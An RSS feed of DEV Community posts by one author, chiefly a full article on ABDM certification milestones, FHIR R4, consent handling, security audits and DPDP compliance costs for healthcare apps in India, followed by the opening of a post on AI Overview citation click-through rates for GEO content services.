<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Manu Shukla</title>
    <description>The latest articles on DEV Community by Manu Shukla (@mr_manushukla).</description>
    <link>https://dev.to/mr_manushukla</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4030821%2Fc19a9586-862e-4358-aeb1-c63dc32f3914.jpg</url>
      <title>DEV Community: Manu Shukla</title>
      <link>https://dev.to/mr_manushukla</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/mr_manushukla"/>
    <language>en</language>
    <item>
      <title>Healthcare app development in India: 4 ABDM milestones, 100 crore records</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 21:05:05 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/healthcare-app-development-in-india-4-abdm-milestones-100-crore-records-1jap</link>
      <guid>https://dev.to/mr_manushukla/healthcare-app-development-in-india-4-abdm-milestones-100-crore-records-1jap</guid>
      <description>&lt;h1&gt;
  
  
  Healthcare app development in India: 4 ABDM milestones, 100 crore records
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; On 22 May 2026 the National Health Authority announced that over 100 crore health records are now linked to Ayushman Bharat Health Accounts, doubled from 50 crore in February 2025 in just 15 months. More than 450 public and private health technology solutions have integrated with the Ayushman Bharat Digital Mission. Uttar Pradesh alone accounts for over 15.03 crore linked records, Andhra Pradesh 11.95 crore. Roughly 10 crore records are now linked every two to three months. That changes what "healthcare app" means commercially in India: ABDM certification across milestones M1 to M4 is the entry ticket to the network, not a feature you add in year two. The technical bar is HL7 FHIR R4 with India-specific profiles, consent artefacts, encrypted record transfer, and a CERT-In or STQC empanelled security audit before the NHA grants production access. The compliance bar is the DPDP Act, where failure to maintain reasonable security safeguards carries a penalty of up to ₹250 crore. Vendor estimates put a lean healthcare MVP at ₹20 lakh to ₹50 lakh, with Indian engineering at ₹1,500 to ₹3,000 per hour. Here is what actually drives that number.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why ABDM stopped being optional
&lt;/h2&gt;

&lt;p&gt;Dr. Sunil Kumar Barnwal, CEO of the National Health Authority, framed the milestone in citizen terms:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"The linking of over 100 crore health records with ABHA is an important milestone in the journey of Ayushman Bharat Digital Mission. It reflects the increasing adoption of digital health services across Government programmes, States, health facilities and private technology partners."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;The commercial reading is different from the policy reading. A network with 100 crore records and 450 integrated solutions has crossed the point where sitting outside it is a product decision with a cost. If a patient's prescriptions, lab reports and discharge summaries live in ABHA-linked records at every other facility they visit, an app that cannot read or write to that network is asking them to maintain a parallel medical history by hand.&lt;/p&gt;

&lt;p&gt;The growth curve is the part worth planning against. ABDM went from fewer than 1,000 linked records in its initial phase to over 100 crore, doubling in the last 15 months. State-level distribution as of 22 May 2026:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;State&lt;/th&gt;
&lt;th&gt;ABHA-linked health records&lt;/th&gt;
&lt;th&gt;Note&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Uttar Pradesh&lt;/td&gt;
&lt;td&gt;Over 15.03 crore&lt;/td&gt;
&lt;td&gt;Leading contributor; eKavach platform&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Andhra Pradesh&lt;/td&gt;
&lt;td&gt;Over 11.95 crore&lt;/td&gt;
&lt;td&gt;State health programmes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Bihar&lt;/td&gt;
&lt;td&gt;Over 7.37 crore&lt;/td&gt;
&lt;td&gt;Substantial progress recorded&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Rajasthan&lt;/td&gt;
&lt;td&gt;Over 6.32 crore&lt;/td&gt;
&lt;td&gt;iHMS platform&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Gujarat&lt;/td&gt;
&lt;td&gt;Over 4.77 crore&lt;/td&gt;
&lt;td&gt;TeCHO platform&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If your addressable market is UP, Andhra Pradesh or Bihar, the network effect has already arrived. Building a non-ABDM app for those states in 2026 is building for a market that has moved.&lt;/p&gt;

&lt;h2&gt;
  
  
  The six building blocks you are integrating with
&lt;/h2&gt;

&lt;p&gt;ABDM is not one API. It is digital public infrastructure with distinct components, and most scoping errors come from treating them as interchangeable.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Building block&lt;/th&gt;
&lt;th&gt;What it does&lt;/th&gt;
&lt;th&gt;When your app needs it&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;ABHA&lt;/td&gt;
&lt;td&gt;Unique digital health identity for citizens&lt;/td&gt;
&lt;td&gt;Any app that identifies a patient&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HPR (Healthcare Professionals Registry)&lt;/td&gt;
&lt;td&gt;Registry of verified practitioners&lt;/td&gt;
&lt;td&gt;Apps with clinician accounts or e-prescribing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HFR (Health Facility Registry)&lt;/td&gt;
&lt;td&gt;Registry of health facilities&lt;/td&gt;
&lt;td&gt;Multi-facility or network apps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;HIE-CM (Health Information Exchange and Consent Manager)&lt;/td&gt;
&lt;td&gt;Consent-based record exchange&lt;/td&gt;
&lt;td&gt;Any app reading or writing records&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UHI (Unified Health Interface)&lt;/td&gt;
&lt;td&gt;Open network for health services&lt;/td&gt;
&lt;td&gt;Discovery and booking use cases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NHCX (National Health Claims Exchange)&lt;/td&gt;
&lt;td&gt;Digital insurance claims&lt;/td&gt;
&lt;td&gt;Payer integration and claims&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The consent manager is the one teams underestimate. ABDM's model is consent-based exchange by design, which means consent artefacts are not a checkbox in your UI. They are objects with lifecycles that your data layer has to honour.&lt;/p&gt;

&lt;h2&gt;
  
  
  The four milestones, and which one is hard
&lt;/h2&gt;

&lt;p&gt;NHA certification runs through progressive milestones. They are not difficulty tiers of the same work; they are different systems.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Milestone&lt;/th&gt;
&lt;th&gt;Role your system takes&lt;/th&gt;
&lt;th&gt;Core capability&lt;/th&gt;
&lt;th&gt;Relative difficulty&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;M1&lt;/td&gt;
&lt;td&gt;Identity provider&lt;/td&gt;
&lt;td&gt;ABHA creation, OTP or QR verification, patient discovery and linking&lt;/td&gt;
&lt;td&gt;Foundational&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M2&lt;/td&gt;
&lt;td&gt;Health Information Provider (HIP)&lt;/td&gt;
&lt;td&gt;Create care contexts, respond to discovery, handle consent artefacts, transfer encrypted FHIR records&lt;/td&gt;
&lt;td&gt;Hardest&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M3&lt;/td&gt;
&lt;td&gt;Health Information User (HIU)&lt;/td&gt;
&lt;td&gt;Request consent, aggregate records across facilities, present clinical data&lt;/td&gt;
&lt;td&gt;Moderate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M4&lt;/td&gt;
&lt;td&gt;Claims participant&lt;/td&gt;
&lt;td&gt;Digital insurance claims via NHCX&lt;/td&gt;
&lt;td&gt;Payer-dependent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;M1 flatters everyone. Creating an ABHA number and verifying a patient by OTP is a week of work, and it produces a demo that looks like ABDM compliance. It is not.&lt;/p&gt;

&lt;p&gt;M2 is where budgets die. To act as a Health Information Provider you build a full FHIR R4 record-sharing system: care contexts created after each consultation, discovery requests answered from the Consent Manager, consent artefacts validated and honoured, records serialised and encrypted, and every access logged. Each of those is a distinct subsystem with its own failure modes.&lt;/p&gt;

&lt;p&gt;Our experience of these builds is blunt: teams that scope M1 and M2 as one line item are usually off by a factor of three on M2 alone.&lt;/p&gt;

&lt;h2&gt;
  
  
  What FHIR R4 actually demands
&lt;/h2&gt;

&lt;p&gt;ABDM uses HL7 FHIR R4 with India-specific profiles. Every ABDM-compliant facility must serialise clinical documents as FHIR resources so that any other compliant system can parse them. The resources you will implement, at minimum:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Patient              // demographics, ABHA linkage
Practitioner         // HPR-verified clinician
Organization         // HFR-registered facility
Encounter            // the visit
Observation          // vitals, lab results
Condition            // diagnoses
MedicationRequest    // prescriptions
DiagnosticReport     // lab and imaging reports
DocumentReference    // discharge summaries, scanned docs
AllergyIntolerance   // allergies
Procedure            // procedures performed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The trap here is not the resource list. It is that most Indian hospital systems store clinical data as free text or PDFs, and FHIR wants structure. A discharge summary that exists as a scanned image satisfies nobody: it can be wrapped in a DocumentReference, but the Condition and MedicationRequest resources inside it stay invisible to the network. Retrofitting structure onto years of unstructured records is the single largest hidden cost in ABDM projects, and it is a data problem, not an API problem.&lt;/p&gt;

&lt;p&gt;The real cost is usually the migration, not the integration.&lt;/p&gt;

&lt;h2&gt;
  
  
  Certification is a security audit with an API attached
&lt;/h2&gt;

&lt;p&gt;Before the NHA grants production access, your web application needs a security audit from a CERT-In or STQC empanelled agency. Certification agencies then review your M1, M2 and M3 workflows against NHA's official test case templates, covering ABHA creation, verification, discovery, consent handling and data transfer.&lt;/p&gt;

&lt;p&gt;Two scheduling consequences follow, and they are why ABDM projects slip.&lt;/p&gt;

&lt;p&gt;First, the audit is a dependency you do not control. Empanelled agencies have queues, and a failed audit means a remediation cycle plus a re-audit, not a same-week fix.&lt;/p&gt;

&lt;p&gt;Second, sandbox success does not predict production success. The sandbox validates your workflows. The audit validates your security posture. Teams routinely pass one and fail the other, because they were built by different people to different standards.&lt;/p&gt;

&lt;p&gt;Budget the audit at project start, not at the end. It is the item most likely to be discovered late and cost a quarter.&lt;/p&gt;

&lt;h2&gt;
  
  
  Where the money actually goes
&lt;/h2&gt;

&lt;p&gt;Published Indian cost estimates vary widely enough that any single number should be treated with suspicion. Vendor guides put a lean healthcare MVP at roughly ₹20 lakh to ₹50 lakh, a telemedicine or patient portal platform at ₹1.25 crore to ₹2.5 crore, and a full custom EHR or hospital management system at ₹1.65 crore to ₹4.15 crore. Other India-focused guides quote materially lower domestic ranges for equivalent scope. Indian engineering rates cluster more consistently at ₹1,500 to ₹3,000 per hour.&lt;/p&gt;

&lt;p&gt;The spread tells you something useful: these figures price feature lists, and feature lists are not what drives healthcare app cost. The drivers are:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cost driver&lt;/th&gt;
&lt;th&gt;Why it dominates&lt;/th&gt;
&lt;th&gt;Typical underestimate&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Unstructured data migration&lt;/td&gt;
&lt;td&gt;FHIR needs structure; legacy records are PDFs and free text&lt;/td&gt;
&lt;td&gt;Largest single overrun&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M2 HIP subsystems&lt;/td&gt;
&lt;td&gt;Consent, encryption, audit, care contexts are four systems&lt;/td&gt;
&lt;td&gt;Scoped as one&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CERT-In / STQC audit cycle&lt;/td&gt;
&lt;td&gt;External queue plus remediation and re-audit&lt;/td&gt;
&lt;td&gt;Scoped at zero&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DPDP alignment&lt;/td&gt;
&lt;td&gt;Consent architecture touches every data path&lt;/td&gt;
&lt;td&gt;Retrofitted, not designed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Clinical workflow fidelity&lt;/td&gt;
&lt;td&gt;An app clinicians route around has failed regardless of certification&lt;/td&gt;
&lt;td&gt;Treated as UI polish&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Compliance and data architecture are the major cost drivers in Indian healthcare builds, and retrofitting compliance later adds substantial cost. That is the one point on which the vendor guides agree with our own experience.&lt;/p&gt;

&lt;h2&gt;
  
  
  The consent artefact is a lifecycle, not a checkbox
&lt;/h2&gt;

&lt;p&gt;Worth its own section, because it is where most M2 implementations go wrong.&lt;/p&gt;

&lt;p&gt;In ABDM's model, a patient grants consent through the Health Information Exchange and Consent Manager, and your system receives a consent artefact. Teams tend to read that artefact once, decide the request is authorised, and serve the data. That is the bug.&lt;/p&gt;

&lt;p&gt;A consent artefact carries scope and time boundaries. It names which care contexts are covered, what data types are permitted, and for how long. It can be revoked. It expires. Your data layer has to check it at the moment of access rather than at the moment of receipt, which means consent state has to be queryable from wherever records are served, not cached in the session that first saw it.&lt;/p&gt;

&lt;p&gt;The discovery step has a matching subtlety. When a Consent Manager sends a discovery request, your system answers whether it holds records for that patient. Answer too loosely and you leak the existence of a care relationship to a request that was never authorised. Patient discovery is an information disclosure surface, and it deserves the same care as the record transfer itself.&lt;/p&gt;

&lt;p&gt;None of this is exotic engineering. It is the sort of thing that gets built correctly when someone scopes it as a subsystem and gets built wrong when it appears as a ticket titled "handle consent".&lt;/p&gt;

&lt;h2&gt;
  
  
  Adoption is the metric that ABDM certification does not measure
&lt;/h2&gt;

&lt;p&gt;A certified app that clinicians route around has consumed a budget and produced a compliance artefact.&lt;/p&gt;

&lt;p&gt;The pattern to watch for: an outpatient department where the doctor writes on paper during the consultation and a data-entry operator keys it into the system afterwards. The facility is ABDM-compliant. The records reaching the network are a transcription of a transcription, entered by someone who was not in the room, hours later. The structure is real and the clinical fidelity is not.&lt;/p&gt;

&lt;p&gt;This is why we put clinical workflow design alongside the milestone work rather than after it. FHIR resources are only as good as the moment of capture. If your Observation resources are typed in at 6pm from a paper chit, ABDM will accept them and no clinician will trust them.&lt;/p&gt;

&lt;h2&gt;
  
  
  India-specific considerations: DPDP runs on a separate clock
&lt;/h2&gt;

&lt;p&gt;ABDM certification does not discharge your DPDP obligations. They are different regimes with different deadlines.&lt;/p&gt;

&lt;p&gt;Under the Digital Personal Data Protection Act 2023, failure to maintain reasonable security safeguards attracts a penalty of up to ₹250 crore, and breach notification failures up to ₹200 crore. The Data Protection Board of India was established and the penalty framework became active in November 2025. The Consent Manager Framework becomes operational on 13 November 2026, and full compliance for data fiduciaries lands on 13 May 2027.&lt;/p&gt;

&lt;p&gt;Health data is the highest-stakes category in that regime, and the timing is awkward in a specific way: teams building ABDM consent flows through 2026 are building consent architecture twice if they do not design for both regimes at once. ABDM's HIE-CM consent artefact and DPDP's Consent Manager obligations are related but not identical, and the sensible engineering call is one consent layer that satisfies both rather than two that argue.&lt;/p&gt;

&lt;p&gt;We design applications aligned with DPDP Act and ABDM requirements. We do not claim to certify you; the CERT-In or STQC audit and the NHA review are independent gates, and any vendor promising to guarantee that outcome is telling you something untrue.&lt;/p&gt;

&lt;p&gt;For the broader picture see our guides to &lt;a href="https://ecorpit.com/blog/dpdp-compliance-cost-indian-startups-2027-deadline/" rel="noopener noreferrer"&gt;DPDP compliance costs for Indian startups&lt;/a&gt;, &lt;a href="https://ecorpit.com/blog/healthcare-ai-deployment-mistakes-indian-hospitals-2026/" rel="noopener noreferrer"&gt;healthcare AI deployment mistakes in Indian hospitals&lt;/a&gt;, and &lt;a href="https://ecorpit.com/blog/healthcare-ai-india-cdsco-dpdp-deployment-steps-2026/" rel="noopener noreferrer"&gt;clinical AI under CDSCO and DPDP&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  What eCorpIT builds
&lt;/h2&gt;

&lt;p&gt;eCorpIT is a Gurugram technology consultancy founded in 2021, CMMI Level 5 assessed and MSME certified. Our healthcare engagements are structured around the milestones rather than around screens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Data readiness first.&lt;/strong&gt; Before any ABDM work, we assess how much of your clinical data is structured and how much is PDFs and free text. This determines your real timeline more than any other factor, and it is the assessment most vendors skip because the answer is usually unwelcome.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;M1 to M3 implementation.&lt;/strong&gt; ABHA identity and linking, then the HIP subsystems (care contexts, discovery, consent artefacts, encrypted FHIR transfer, audit logging) as separately scoped work, then HIU aggregation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Audit preparation.&lt;/strong&gt; Security posture built for the CERT-In or STQC review from the first sprint, not remediated after a failure.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Consent architecture that serves both regimes.&lt;/strong&gt; One consent layer designed against ABDM's HIE-CM model and the DPDP Consent Manager timeline, ahead of the 13 November 2026 date.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Clinical workflow design.&lt;/strong&gt; Apps that clinicians use rather than route around. Certification with no adoption is an expensive compliance artefact.&lt;/p&gt;

&lt;h2&gt;
  
  
  Who should not build this yet
&lt;/h2&gt;

&lt;p&gt;If you run a single clinic with fewer than 20 daily consultations and paper records, ABDM certification is not your first problem. Structure your data first; the network will still be there.&lt;/p&gt;

&lt;p&gt;If your product does not read or write clinical records, you may need M1 and nothing else. Do not let a vendor sell you M2.&lt;/p&gt;

&lt;p&gt;If you want a fixed-price quote before anyone has looked at your data structure, no honest answer exists. The migration is the project.&lt;/p&gt;

&lt;h2&gt;
  
  
  FAQ
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;How many health records are linked to ABHA?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Over 100 crore as of 22 May 2026, per the National Health Authority. The figure doubled from 50 crore in February 2025 in 15 months, and roughly 10 crore new records are now linked every two to three months. More than 450 public and private health technology solutions have integrated with the ABDM ecosystem.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What are the ABDM M1, M2, M3 and M4 milestones?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;M1 makes your system an identity provider handling ABHA creation, verification and patient discovery. M2 makes it a Health Information Provider sharing FHIR records on patient consent. M3 makes it a Health Information User fetching records from other providers. M4 enables digital insurance claims through the National Health Claims Exchange.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Which ABDM milestone is hardest to build?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;M2. Acting as a Health Information Provider means building a full FHIR R4 record-sharing system with care contexts, discovery responses, consent artefact handling, encryption and audit logging. Each is a distinct subsystem. Teams that scope M1 and M2 together typically underestimate M2 substantially, because M1 demos deceptively well.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What FHIR version does ABDM use?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;HL7 FHIR R4 with India-specific profiles. Core resources include Patient, Practitioner, Organization, Encounter, Observation, Condition, MedicationRequest, DiagnosticReport, DocumentReference, AllergyIntolerance and Procedure. Every compliant facility must serialise discharge summaries, prescriptions and lab reports as FHIR resources so other compliant systems can parse them.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Do I need a security audit for ABDM production access?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Yes. A web application security audit by a CERT-In or STQC empanelled agency is required before the NHA grants production access. Certification agencies separately test your M1, M2 and M3 workflows against NHA's official test case templates. Sandbox success does not predict audit success, so budget both from project start.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What does a healthcare app cost to build in India?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Vendor estimates vary widely and should be treated cautiously. Published guides put a lean MVP at ₹20 lakh to ₹50 lakh and a full custom EHR or hospital management system at ₹1.65 crore to ₹4.15 crore. Indian engineering rates are more consistent at ₹1,500 to ₹3,000 per hour.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Does ABDM certification cover my DPDP obligations?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;No. They are separate regimes. Under the DPDP Act 2023, failure to maintain reasonable security safeguards carries a penalty of up to ₹250 crore and breach notification failures up to ₹200 crore. The Consent Manager Framework becomes operational on 13 November 2026, with full compliance for data fiduciaries on 13 May 2027.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is the biggest hidden cost in an ABDM project?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Unstructured data. FHIR requires structured resources, and most Indian hospital systems hold clinical data as free text or scanned PDFs. A scanned discharge summary can be wrapped in a DocumentReference, but the diagnoses and prescriptions inside stay invisible to the network. Retrofitting structure onto legacy records typically dominates the budget.&lt;/p&gt;

&lt;h2&gt;
  
  
  How eCorpIT can help
&lt;/h2&gt;

&lt;p&gt;eCorpIT builds clinical and patient applications for Indian hospital groups and healthtech founders, scoped around the ABDM milestones and the state of your existing clinical data rather than around a feature list. Our senior engineering teams handle ABHA identity, HIP and HIU implementation on FHIR R4, and consent architecture designed against both ABDM's HIE-CM model and the DPDP Consent Manager timeline. We design applications aligned with DPDP Act and ABDM requirements, and we will tell you honestly if data structuring should come before certification. &lt;a href="https://ecorpit.com/contact-us/" rel="noopener noreferrer"&gt;Talk to us&lt;/a&gt; about a data readiness assessment before you commit to a milestone plan.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://www.pib.gov.in/PressReleasePage.aspx?PRID=2264241&amp;amp;reg=3&amp;amp;lang=1" rel="noopener noreferrer"&gt;100 Crore Health Records Linked with ABHA under ABDM&lt;/a&gt; — Press Information Bureau, Ministry of Health and Family Welfare, 22 May 2026.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://abdm.gov.in/documents/HealthDataManagementPolicy" rel="noopener noreferrer"&gt;Health Data Management Policy&lt;/a&gt; — Ayushman Bharat Digital Mission, National Health Authority.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.india.gov.in/category/health-wellness/subcategory/health-care-promotion-products/details/health-data-management-policy-of-ayushman-bharat-digital-mission-abdm" rel="noopener noreferrer"&gt;Health Data Management Policy of Ayushman Bharat Digital Mission&lt;/a&gt; — National Portal of India.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://codingclave.com/guides/abdm-m1-m2-m3-certification-guide-india-2026" rel="noopener noreferrer"&gt;ABDM M1/M2/M3 Certification Guide India 2026: NHA Sandbox to Production&lt;/a&gt; — Codingclave.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nirmitee.io/blog/abdm-integration-milestones-m1-m2-m3-m4-multi-software-guide/" rel="noopener noreferrer"&gt;ABDM Integration Milestones M1 M2 M3 M4&lt;/a&gt; — Nirmitee.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nirmitee.io/blog/abdm-certification-process-sandbox-to-production-guide/" rel="noopener noreferrer"&gt;ABDM Certification Process Explained: Sandbox to Production&lt;/a&gt; — Nirmitee.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.adrine.in/blog/abdm-fhir-integration-guide-2026" rel="noopener noreferrer"&gt;ABDM FHIR Integration Guide 2026&lt;/a&gt; — Adrine.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://nirmitee.io/blog/building-abdm-hip-from-scratch-m2-flow-reference-architecture/" rel="noopener noreferrer"&gt;Building an ABDM HIP from Scratch: M2 Flow Reference Architecture&lt;/a&gt; — Nirmitee.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.coronasafe.network/abdm-documentation/implementers-guide/abdm-sandbox-integration-and-exit-process" rel="noopener noreferrer"&gt;ABDM Sandbox Integration and Exit process&lt;/a&gt; — CoronaSafe Network ABDM documentation.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://piramal-swasthya.gitbook.io/amrit/architecture/integrations/abdm-fhir-developer-intro/amrit-abdm-integration/milestone-one-m1-abha-and-identity-layer" rel="noopener noreferrer"&gt;Milestone One (M1): ABHA and Identity Layer&lt;/a&gt; — AMRIT, Piramal Swasthya.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://pmc.ncbi.nlm.nih.gov/articles/PMC10064942/" rel="noopener noreferrer"&gt;The Ayushman Bharat Digital Mission (ABDM)&lt;/a&gt; — PubMed Central, National Institutes of Health.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.aalpha.net/articles/how-much-does-it-cost-to-develop-a-healthcare-mobile-app/" rel="noopener noreferrer"&gt;Healthcare App Development Cost: 2026 Guide&lt;/a&gt; — Aalpha.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.lunarwebsolution.com/blog/healthcare-app-development-cost-in-us-india" rel="noopener noreferrer"&gt;Healthcare App Development Cost in US, India 2026 Guide&lt;/a&gt; — Lunar Web Solution.&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.india-briefing.com/news/india-dpdp-compliance-timeline-enforcement-2026-27-44740.html/" rel="noopener noreferrer"&gt;India's DPDP Timeline: Critical Compliance Deadlines for 2026-27&lt;/a&gt; — India Briefing.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Last updated: 16 July 2026.&lt;/p&gt;

</description>
      <category>healthcareappdevelop</category>
    </item>
    <item>
      <title>GEO and AEO content services: 120% more clicks when AI cites you</title>
      <dc:creator>Manu Shukla</dc:creator>
      <pubDate>Wed, 15 Jul 2026 20:58:44 +0000</pubDate>
      <link>https://dev.to/mr_manushukla/geo-and-aeo-content-services-120-more-clicks-when-ai-cites-you-2l6d</link>
      <guid>https://dev.to/mr_manushukla/geo-and-aeo-content-services-120-more-clicks-when-ai-cites-you-2l6d</guid>
      <description>&lt;h1&gt;
  
  
  GEO and AEO content services: 120% more clicks when AI cites you
&lt;/h1&gt;

&lt;p&gt;&lt;strong&gt;Summary.&lt;/strong&gt; Seer Interactive's April 2026 study, covering 53 brands, 5.47 million queries and 2.43 billion organic impressions, put a number on the thing everyone was arguing about: being cited inside an AI Overview delivers 120% more organic clicks per impression than not being cited on the same page. The click math is stark. Per million informational impressions, a brand cited in the AI Overview earns roughly 20,743 organic clicks; an uncited brand on that same AI Overview page earns roughly 9,445. A page with no AI Overview at all earns about 33,500. So citation is not a return to 2023, it is a 38% discount on it, and it still beats the alternative by more than double. Google's own guidance, updated on 10 July 2026, is blunt that this work is not a new discipline: "optimizing for generative AI search is optimizing for the search experience, and thus still SEO." Indian GEO retainers run ₹75,000 to ₹3,50,000 per month for mid-market scope. Here is what that money should and should not buy.&lt;/p&gt;

&lt;h2&gt;
  
  
  The number that matters, and the three numbers under it
&lt;/h2&gt;

&lt;p&gt;Most GEO pitches lead with fear. The honest version leads with arithmetic.&lt;/p&gt;

&lt;p&gt;Seer Interactive's third AI Overview CTR study, published 24 April 2026 by Product Development Lead Tracy McDonald and colleagues, tracked 53 brands from January 2025 through February 2026. For informational queries, the full-year average organic CTR broke down like this:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;AI Overview status&lt;/th&gt;
&lt;th&gt;Average organic CTR&lt;/th&gt;
&lt;th&gt;Clicks per 1M impressions&lt;/th&gt;
&lt;th&gt;Average paid CTR&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;No AI Overview shown&lt;/td&gt;
&lt;td&gt;3.35%&lt;/td&gt;
&lt;td&gt;~33,500&lt;/td&gt;
&lt;td&gt;19.75%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI Overview, brand cited&lt;/td&gt;
&lt;td&gt;2.07%&lt;/td&gt;
&lt;td&gt;~20,743&lt;/td&gt;
&lt;td&gt;15.74%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AI Overview, brand not cited&lt;/td&gt;
&lt;td&gt;0.94%&lt;/td&gt;
&lt;td&gt;~9,445&lt;/td&gt;
&lt;td&gt;11.19%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Read the middle row twice. Citation does not restore your traffic. It roughly doubles what you would otherwise get on a page you have already lost control of. Seer's own framing: a citation "is an advantage relative to everyone else on the same AIO-present SERP. It's not a return to the pre-AIO baseline."&lt;/p&gt;

